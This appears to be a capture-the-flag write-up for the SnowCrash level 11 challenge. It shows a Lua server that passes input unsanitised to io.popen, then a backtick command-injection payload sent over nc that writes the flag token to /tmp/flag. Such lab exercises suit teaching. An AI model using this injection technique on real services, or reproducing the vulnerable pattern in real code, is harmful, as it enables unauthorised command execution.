1/ level11@SnowCrash:~$ cat level11.lua 
#!/usr/bin/env lua
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 5151))

function hash(pass)
  prog = io.popen("echo "..pass.." | sha1sum", "r")
  data = prog:read("*all")
  prog:close()

  data = string.sub(data, 1, 40)

  return data
end


while 1 do
  local client = server:accept()
  client:send("Password: ")
  client:settimeout(60)
  local l, err = client:receive()
  if not err then
      print("trying " .. l)
      local h = hash(l)

      if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
          client:send("Erf nope..\n");
      else
          client:send("Gz you dumb*\n")
      end

  end

  client:close()
end

2/ 
level11@SnowCrash:~$ nc localhost 5151
Password: 
connect to localhost 5151 via nc
-> password is asked
hashed pw f05d1d066fb246efe0c6f7d095f909a7a0cf34a0 not working..
dcode.fr -> Decipher with SHA-1: SHA1 = NotSoEasy
not working...

3/ We need to pass a getflag command and recover the result on a /tmp/flag file:
-rwsr-sr-x  1 flag11  level11  668 Mar  5  2016 level11.lua
level11@SnowCrash:~$ nc 127.0.0.1 5151
Password: `getflag > /tmp/flag`
Erf nope..
level11@SnowCrash:~$ cat /tmp/flag
Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
level11@SnowCrash:~$ su level12
Password: 
level12@SnowCrash:~$ 
